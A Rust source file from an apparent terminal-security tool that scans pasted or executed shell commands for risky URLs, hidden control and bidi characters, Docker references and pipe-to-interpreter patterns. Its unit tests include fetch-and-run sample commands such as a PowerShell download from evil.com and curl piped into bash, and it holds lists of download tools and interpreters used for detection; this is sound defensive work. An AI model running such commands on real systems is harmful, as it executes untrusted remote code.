Skip to main content

tirith_core/
extract.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Context for Tier 1 scanning.
///
/// Selects which generated Tier 1 regex [`tier1_scan`] runs against the input.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// Exec-time: command about to be executed (check subcommand).
    Exec,
    /// Paste-time: content being pasted (paste subcommand).
    Paste,
}
15
// Include generated Tier 1 patterns from build.rs declarative pattern table.
// Items this file reads from the generated code: `EXTRACTOR_IDS`,
// `TIER1_EXEC_PATTERN`, `TIER1_PASTE_PATTERN`, `TIER1_EXEC_FRAGMENT_COUNT`
// and `TIER1_PASTE_FRAGMENT_COUNT`.
// NOTE(review): `dead_code` is presumably allowed because some generated items
// (e.g. the fragment counts) are only referenced from the test module — confirm.
#[allow(dead_code)]
mod tier1_generated {
    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
21
22/// Expose the build-time extractor IDs for test-time cross-referencing.
23pub fn extractor_ids() -> &'static [&'static str] {
24    tier1_generated::EXTRACTOR_IDS
25}
26
/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
///
/// Compiled lazily on first use; a pattern that fails to compile panics with
/// the `expect` message below.
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});
31
/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
///
/// Compiled lazily on first use; a pattern that fails to compile panics with
/// the `expect` message below.
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
36
/// Standard URL extraction regex for Tier 3.
///
/// Matches either of two alternatives:
/// - an `http`/`https`/`ftp`/`ssh`/`git` scheme followed by `://` and every
///   character up to the next whitespace, quote, `<` or `>`;
/// - an scp-style `user@host:path` reference (e.g. `git@github.com:user/repo`),
///   where user and host consist of ASCII alphanumerics, `.`, `_` and `-`.
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
    )
    .expect("url regex must compile")
});
44
/// Outcome of the paste-time byte scan performed by `scan_bytes`.
///
/// Each `has_*` flag summarises one category of finding; `details` holds one
/// entry per individual finding. `Default` yields an all-clear result
/// (every flag `false`, no details).
#[derive(Debug, Clone, Default, PartialEq, Eq)]
pub struct ByteScanResult {
    /// An ESC (0x1b) byte was found.
    pub has_ansi_escapes: bool,
    /// A control byte below 0x20 (other than `\n`, `\t` and ESC) or DEL (0x7f) was found.
    pub has_control_chars: bool,
    /// A Unicode bidirectional control character was found.
    pub has_bidi_controls: bool,
    /// A zero-width character was found.
    pub has_zero_width: bool,
    /// The input as a whole is not valid UTF-8.
    pub has_invalid_utf8: bool,
    /// Individual findings, one per flagged location.
    pub details: Vec<ByteFinding>,
}

/// A single suspicious location reported by the byte scan.
#[derive(Debug, Clone, Default, PartialEq, Eq)]
pub struct ByteFinding {
    /// Byte offset of the finding within the scanned input.
    pub offset: usize,
    /// The byte at `offset` (the lead byte for multi-byte characters).
    pub byte: u8,
    /// Human-readable description of what was found.
    pub description: String,
}
60
61/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
62pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
63    match context {
64        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
65        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
66    }
67}
68
69/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
70pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
71    let mut result = ByteScanResult {
72        has_ansi_escapes: false,
73        has_control_chars: false,
74        has_bidi_controls: false,
75        has_zero_width: false,
76        has_invalid_utf8: false,
77        details: Vec::new(),
78    };
79
80    // Check for invalid UTF-8
81    if std::str::from_utf8(input).is_err() {
82        result.has_invalid_utf8 = true;
83    }
84
85    let len = input.len();
86    let mut i = 0;
87    while i < len {
88        let b = input[i];
89
90        // Escape sequences: CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP)
91        if b == 0x1b {
92            if i + 1 < len {
93                let next = input[i + 1];
94                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
95                    result.has_ansi_escapes = true;
96                    result.details.push(ByteFinding {
97                        offset: i,
98                        byte: b,
99                        description: match next {
100                            b'[' => "CSI escape sequence",
101                            b']' => "OSC escape sequence",
102                            b'_' => "APC escape sequence",
103                            b'P' => "DCS escape sequence",
104                            _ => "escape sequence",
105                        }
106                        .to_string(),
107                    });
108                    i += 2;
109                    continue;
110                }
111            } else {
112                // Trailing lone ESC
113                result.has_ansi_escapes = true;
114                result.details.push(ByteFinding {
115                    offset: i,
116                    byte: b,
117                    description: "trailing escape byte".to_string(),
118                });
119            }
120        }
121
122        // Control characters (< 0x20, excluding common whitespace and ESC)
123        if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
124            result.has_control_chars = true;
125            result.details.push(ByteFinding {
126                offset: i,
127                byte: b,
128                description: format!("control character 0x{b:02x}"),
129            });
130        }
131
132        // DEL character
133        if b == 0x7F {
134            result.has_control_chars = true;
135            result.details.push(ByteFinding {
136                offset: i,
137                byte: b,
138                description: "control character 0x7f (DEL)".to_string(),
139            });
140        }
141
142        // Check for UTF-8 multi-byte sequences that are bidi or zero-width
143        if b >= 0xc0 {
144            // Try to decode UTF-8 character
145            let remaining = &input[i..];
146            if let Some(ch) = std::str::from_utf8(remaining)
147                .ok()
148                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
149                .and_then(|s| s.chars().next())
150            {
151                // Bidi controls
152                if is_bidi_control(ch) {
153                    result.has_bidi_controls = true;
154                    result.details.push(ByteFinding {
155                        offset: i,
156                        byte: b,
157                        description: format!("bidi control U+{:04X}", ch as u32),
158                    });
159                }
160                // Zero-width characters
161                if is_zero_width(ch) {
162                    result.has_zero_width = true;
163                    result.details.push(ByteFinding {
164                        offset: i,
165                        byte: b,
166                        description: format!("zero-width character U+{:04X}", ch as u32),
167                    });
168                }
169                i += ch.len_utf8();
170                continue;
171            }
172        }
173
174        i += 1;
175    }
176
177    result
178}
179
/// Check if a character is a bidi control.
///
/// Covers the full Unicode `Bidi_Control` property: the Arabic letter mark,
/// the implicit marks, the embedding/override controls and the isolate controls.
fn is_bidi_control(ch: char) -> bool {
    matches!(
        ch,
        '\u{061C}' // ALM
        | '\u{200E}' // LRM
        | '\u{200F}' // RLM
        | '\u{202A}' // LRE
        | '\u{202B}' // RLE
        | '\u{202C}' // PDF
        | '\u{202D}' // LRO
        | '\u{202E}' // RLO
        | '\u{2066}' // LRI
        | '\u{2067}' // RLI
        | '\u{2068}' // FSI
        | '\u{2069}' // PDI
    )
}
197
/// Report whether `ch` is one of the zero-width characters the scanner flags:
/// ZWSP, ZWNJ, ZWJ, or BOM / ZWNBSP.
fn is_zero_width(ch: char) -> bool {
    const ZERO_WIDTH: [char; 4] = [
        '\u{200B}', // ZWSP
        '\u{200C}', // ZWNJ
        '\u{200D}', // ZWJ
        '\u{FEFF}', // BOM / ZWNBSP
    ];
    ZERO_WIDTH.contains(&ch)
}
208
209/// Tier 3: Extract URL-like patterns from a command string.
210/// Uses shell-aware tokenization, then extracts URLs from each segment.
211pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
212    let segments = tokenize::tokenize(input, shell);
213    let mut results = Vec::new();
214
215    for (seg_idx, segment) in segments.iter().enumerate() {
216        // Extract standard URLs from raw text
217        for mat in URL_REGEX.find_iter(&segment.raw) {
218            let raw = mat.as_str().to_string();
219            let url = parse::parse_url(&raw);
220            results.push(ExtractedUrl {
221                raw,
222                parsed: url,
223                segment_index: seg_idx,
224                in_sink_context: is_sink_context(segment, &segments),
225            });
226        }
227
228        // Check for schemeless URLs in sink contexts
229        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
230        let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
231            let cmd_lower = cmd.to_lowercase();
232            matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
233        });
234        if is_sink_context(segment, &segments) && !is_docker_cmd {
235            for arg in &segment.args {
236                let clean = strip_quotes(arg);
237                if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
238                    results.push(ExtractedUrl {
239                        raw: clean.clone(),
240                        parsed: UrlLike::SchemelessHostPath {
241                            host: extract_host_from_schemeless(&clean),
242                            path: extract_path_from_schemeless(&clean),
243                        },
244                        segment_index: seg_idx,
245                        in_sink_context: true,
246                    });
247                }
248            }
249        }
250
251        // Check for Docker refs in docker commands
252        if let Some(cmd) = &segment.command {
253            let cmd_lower = cmd.to_lowercase();
254            if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
255                if let Some(docker_subcmd) = segment.args.first() {
256                    let subcmd_lower = docker_subcmd.to_lowercase();
257                    if subcmd_lower == "build" {
258                        // For build, only -t/--tag values are image refs
259                        let mut i = 1;
260                        while i < segment.args.len() {
261                            let arg = strip_quotes(&segment.args[i]);
262                            if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
263                                let tag_val = strip_quotes(&segment.args[i + 1]);
264                                if !tag_val.is_empty() {
265                                    let docker_url = parse::parse_docker_ref(&tag_val);
266                                    results.push(ExtractedUrl {
267                                        raw: tag_val,
268                                        parsed: docker_url,
269                                        segment_index: seg_idx,
270                                        in_sink_context: true,
271                                    });
272                                }
273                                i += 2;
274                            } else if arg.starts_with("-t") && arg.len() > 2 {
275                                let tag_val = strip_quotes(&arg[2..]);
276                                let docker_url = parse::parse_docker_ref(&tag_val);
277                                results.push(ExtractedUrl {
278                                    raw: tag_val,
279                                    parsed: docker_url,
280                                    segment_index: seg_idx,
281                                    in_sink_context: true,
282                                });
283                                i += 1;
284                            } else if let Some(val) = arg.strip_prefix("--tag=") {
285                                let tag_val = strip_quotes(val);
286                                let docker_url = parse::parse_docker_ref(&tag_val);
287                                results.push(ExtractedUrl {
288                                    raw: tag_val,
289                                    parsed: docker_url,
290                                    segment_index: seg_idx,
291                                    in_sink_context: true,
292                                });
293                                i += 1;
294                            } else {
295                                i += 1;
296                            }
297                        }
298                    } else if subcmd_lower == "image" {
299                        // docker image pull/push/inspect — actual subcmd is args[1]
300                        if let Some(image_subcmd) = segment.args.get(1) {
301                            let image_subcmd_lower = image_subcmd.to_lowercase();
302                            if matches!(
303                                image_subcmd_lower.as_str(),
304                                "pull" | "push" | "inspect" | "rm" | "tag"
305                            ) {
306                                extract_first_docker_image(
307                                    &segment.args[2..],
308                                    seg_idx,
309                                    &mut results,
310                                );
311                            }
312                        }
313                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
314                        // First non-flag arg is image, then stop
315                        extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
316                    }
317                }
318            }
319        }
320    }
321
322    results
323}
324
/// An extracted URL with context.
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
    /// The reference text as extracted: a regex match from the segment, or an
    /// argument with its surrounding quotes stripped.
    pub raw: String,
    /// Structured interpretation of `raw` (URL, schemeless host/path, Docker ref, ...).
    pub parsed: UrlLike,
    /// Index of the tokenized segment the reference was found in.
    pub segment_index: usize,
    /// Whether the reference was found in a sink (executing/downloading) context.
    pub in_sink_context: bool,
}
333
/// Common value-taking flags across docker subcommands.
///
/// When `extract_first_docker_image` sees an argument equal to one of these,
/// it also skips the following argument (the flag's value).
/// NOTE(review): the list is shared by all subcommands, so a flag that is
/// boolean for one of them (e.g. `-f` for `rm`) is still treated as taking a
/// value — confirm this is acceptable.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    "--platform",
    "--format",
    "--filter",
    "-f",
    "--label",
    "-l",
    "--name",
    "--hostname",
    "--user",
    "-u",
    "--workdir",
    "-w",
    "--network",
    "--net",
    "--env",
    "-e",
    "--env-file",
    "--publish",
    "-p",
    "--expose",
    "--volume",
    "-v",
    "--mount",
    "--add-host",
    "--device",
    "--entrypoint",
    "--log-driver",
    "--log-opt",
    "--restart",
    "--runtime",
    "--cpus",
    "--cpu-shares",
    "--cpu-quota",
    "--memory",
    "--memory-reservation",
    "--memory-swap",
    "--shm-size",
    "--ulimit",
    "--security-opt",
    "--sysctl",
    "--tmpfs",
    "--gpus",
    "--ipc",
    "--pid",
    "--userns",
    "--cgroupns",
];
383
/// Short flags that may embed their value inline (e.g., -p8080:80).
///
/// An argument that starts with one of these and is longer than the prefix
/// already carries its value, so it occupies a single argument.
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
386
387/// Extract the first non-flag argument as a Docker image reference.
388fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
389    let mut skip_next = false;
390    for arg in args {
391        if skip_next {
392            skip_next = false;
393            continue;
394        }
395        let clean = strip_quotes(arg);
396        if clean == "--" {
397            break;
398        }
399        if clean.starts_with("--") && clean.contains('=') {
400            continue; // --flag=value, skip
401        }
402        if clean.starts_with('-') {
403            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
404                skip_next = true;
405            }
406            if DOCKER_VALUE_PREFIXES
407                .iter()
408                .any(|p| clean.starts_with(p) && clean.len() > p.len())
409            {
410                continue;
411            }
412            continue;
413        }
414        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
415            let docker_url = parse::parse_docker_ref(&clean);
416            results.push(ExtractedUrl {
417                raw: clean,
418                parsed: docker_url,
419                segment_index: seg_idx,
420                in_sink_context: true,
421            });
422        }
423        break; // Only first non-flag arg is the image
424    }
425}
426
427/// Check if a segment is in a "sink" context (executing/downloading).
428fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
429    if let Some(cmd) = &segment.command {
430        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
431        let cmd_lower = cmd_base.to_lowercase();
432        if is_source_command(&cmd_lower) {
433            return true;
434        }
435    }
436
437    // Check if this segment pipes into a sink
438    if let Some(sep) = &segment.preceding_separator {
439        if sep == "|" || sep == "|&" {
440            // This segment receives piped input — check if it's an interpreter
441            if let Some(cmd) = &segment.command {
442                let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
443                if is_interpreter(cmd_base) {
444                    return true;
445                }
446            }
447        }
448    }
449
450    false
451}
452
/// Report whether `cmd` is one of the commands treated as a sink on its own
/// (download, remote-access, container and package-manager tools).
///
/// The comparison is exact, so callers pass an already-lowercased basename.
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl",
        "wget",
        "fetch",
        "scp",
        "rsync",
        "git",
        "ssh",
        "docker",
        "podman",
        "nerdctl",
        "pip",
        "pip3",
        "npm",
        "npx",
        "yarn",
        "pnpm",
        "go",
        "cargo",
        "iwr",
        "irm",
        "invoke-webrequest",
        "invoke-restmethod",
    ];
    SOURCE_COMMANDS.contains(&cmd)
}
480
/// Report whether `cmd` names a shell or script interpreter that executes
/// whatever is piped into it.
///
/// The comparison is exact (case-sensitive).
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh",
        "bash",
        "zsh",
        "dash",
        "ksh",
        "python",
        "python3",
        "node",
        "perl",
        "ruby",
        "php",
        "iex",
        "invoke-expression",
    ];
    INTERPRETERS.contains(&cmd)
}
498
/// Trim surrounding whitespace and remove one pair of matching outer quotes.
///
/// Only a leading and trailing quote of the same kind (`"…"` or `'…'`) is
/// removed; a lone quote character or mismatched quotes are returned as-is
/// (after trimming).
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    for quote in ['"', '\''] {
        let inner = trimmed
            .strip_prefix(quote)
            .and_then(|rest| rest.strip_suffix(quote));
        if let Some(unquoted) = inner {
            return unquoted.to_string();
        }
    }
    trimmed.to_string()
}
509
/// Heuristic: does `s` look like a `host[/path]` reference without a scheme?
///
/// The host part is everything before the first `/`. It qualifies when:
/// - `s` does not start with `-` (i.e. is not a flag);
/// - the host part contains a dot and no space;
/// - the host part does not end in a common file extension (so `install.sh`
///   is treated as a file, not a host);
/// - the last dot-separated label is 2 to 63 ASCII letters.
fn looks_like_schemeless_host(s: &str) -> bool {
    // Extensions that mark the host part as a file name rather than a domain.
    const FILE_EXTS: &[&str] = &[
        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt", ".md", ".json",
        ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip",
        ".gz", ".bz2", ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log",
        ".conf", ".cfg", ".ini", ".toml",
    ];

    if s.starts_with('-') {
        return false;
    }

    // Only the part before the first '/' is judged; the path is irrelevant here.
    let host_part = s.split_once('/').map_or(s, |(host, _)| host);
    if !host_part.contains('.') || host_part.contains(' ') {
        return false;
    }

    let host_lower = host_part.to_lowercase();
    if FILE_EXTS.iter().any(|ext| host_lower.ends_with(ext)) {
        return false;
    }

    // The host contains a dot, so there is always a final label after it.
    let tld = host_part.rsplit('.').next().unwrap_or(host_part);
    (2..=63).contains(&tld.len()) && tld.chars().all(|c| c.is_ascii_alphabetic())
}
541
/// Return the host portion of a schemeless reference: everything before the
/// first `/`, or the whole string when there is no `/`.
fn extract_host_from_schemeless(s: &str) -> String {
    let host = match s.find('/') {
        Some(slash) => &s[..slash],
        None => s,
    };
    host.to_string()
}
545
/// Return the path portion of a schemeless reference: everything from the
/// first `/` (inclusive) onwards, or an empty string when there is no `/`.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map(|slash| s[slash..].to_string())
        .unwrap_or_default()
}
553
// Unit tests for this module: Tier 1 regex pre-filter, paste-time byte
// scanning, Tier 3 URL / Docker ref extraction and the small string helpers.
#[cfg(test)]
mod tests {
    use super::*;

    // --- Tier 1 scan: exec-time patterns ---

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!tier1_scan("ls -la", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(tier1_scan("something | bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(tier1_scan("something | env bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(tier1_scan(
            "git clone git@github.com:user/repo",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(tier1_scan(
            "curl https://xn--example-cua.com",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(tier1_scan(
            "iwr https://evil.com/script.ps1",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(tier1_scan(
            "curl https://example.com/install.sh",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        assert!(tier1_scan("open file.zip", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
    }

    // --- Tier 1 scan: paste-time patterns ---

    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        assert!(tier1_scan("café", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_exec_no_non_ascii() {
        // Non-ASCII should NOT trigger exec-time scan
        assert!(!tier1_scan("echo café", ScanContext::Exec));
    }

    // --- Byte scanning ---

    #[test]
    fn test_byte_scan_ansi() {
        let input = b"hello \x1b[31mred\x1b[0m world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_byte_scan_control_chars() {
        // Carriage return is not in the whitespace allow-list (only \n and \t are).
        let input = b"hello\rworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_byte_scan_bidi() {
        let input = "hello\u{202E}dlrow".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_bidi_controls);
    }

    #[test]
    fn test_byte_scan_zero_width() {
        let input = "hel\u{200B}lo".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_zero_width);
    }

    #[test]
    fn test_byte_scan_clean() {
        let input = b"hello world\n";
        let result = scan_bytes(input);
        assert!(!result.has_ansi_escapes);
        assert!(!result.has_control_chars);
        assert!(!result.has_bidi_controls);
        assert!(!result.has_zero_width);
    }

    // --- URL / Docker ref extraction ---

    #[test]
    fn test_extract_urls_basic() {
        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
        assert_eq!(urls.len(), 1);
        assert_eq!(urls[0].raw, "https://example.com/install.sh");
    }

    #[test]
    fn test_extract_urls_pipe() {
        let urls = extract_urls(
            "curl https://example.com/install.sh | bash",
            ShellType::Posix,
        );
        assert!(!urls.is_empty());
        assert!(urls[0].in_sink_context);
    }

    #[test]
    fn test_extract_urls_scp() {
        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
        assert!(!urls.is_empty());
        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
    }

    #[test]
    fn test_extract_docker_ref() {
        let urls = extract_urls("docker pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    #[test]
    fn test_extract_powershell_iwr() {
        let urls = extract_urls(
            "iwr https://example.com/script.ps1 | iex",
            ShellType::PowerShell,
        );
        assert!(!urls.is_empty());
    }

    // --- Helpers and edge cases ---

    #[test]
    fn test_strip_quotes_single_char() {
        // A lone quote character is not a quoted string and must be left intact.
        assert_eq!(strip_quotes("\""), "\"");
        assert_eq!(strip_quotes("'"), "'");
    }

    #[test]
    fn test_strip_quotes_empty() {
        assert_eq!(strip_quotes(""), "");
    }

    // Covers BEL, VT, FF and DEL (FF is exercised although the name omits it).
    #[test]
    fn test_scan_bytes_bel_vt_del() {
        // BEL (0x07)
        let input = b"hello\x07world";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // VT (0x0B)
        let input = b"hello\x0Bworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // FF (0x0C)
        let input = b"hello\x0Cworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // DEL (0x7F)
        let input = b"hello\x7Fworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_scan_bytes_osc_apc_dcs() {
        // OSC: \e]
        let input = b"hello\x1b]0;title\x07world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        // APC: \e_
        let input = b"hello\x1b_dataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        // DCS: \eP
        let input = b"hello\x1bPdataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_schemeless_long_tld() {
        // TLDs longer than six letters must still be accepted.
        assert!(looks_like_schemeless_host("example.academy"));
        assert!(looks_like_schemeless_host("example.photography"));
    }

    #[test]
    fn test_segment_index_correct() {
        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
        // Each URL should have the segment index of the segment it came from
        for url in &urls {
            // segment_index should be 0 or 1, not an incrementing counter
            assert!(url.segment_index <= 1);
        }
    }

    #[test]
    fn test_docker_build_context_not_image() {
        let urls = extract_urls("docker build .", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(
            docker_urls.len(),
            0,
            "build context '.' should not be treated as image"
        );
    }

    #[test]
    fn test_docker_image_subcmd() {
        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    /// Constraint #2: Verify that EXTRACTOR_IDS is non-empty and
    /// that all generated fragment counts are positive.
    /// This is a module boundary enforcement test — ensures no secret
    /// extractors exist outside the declarative pattern table.
    #[test]
    fn test_tier1_module_boundary_enforcement() {
        // Verify extractor IDs are generated
        let ids = tier1_generated::EXTRACTOR_IDS;
        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
        // Verify exec and paste fragment counts
        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
        assert!(exec_count > 0, "Must have exec fragments");
        assert!(
            paste_count >= exec_count,
            "Paste fragments must be superset of exec fragments"
        );
        // Verify the generated patterns are valid regexes
        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
            .expect("Generated exec pattern must be valid regex");
        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
            .expect("Generated paste pattern must be valid regex");
    }
}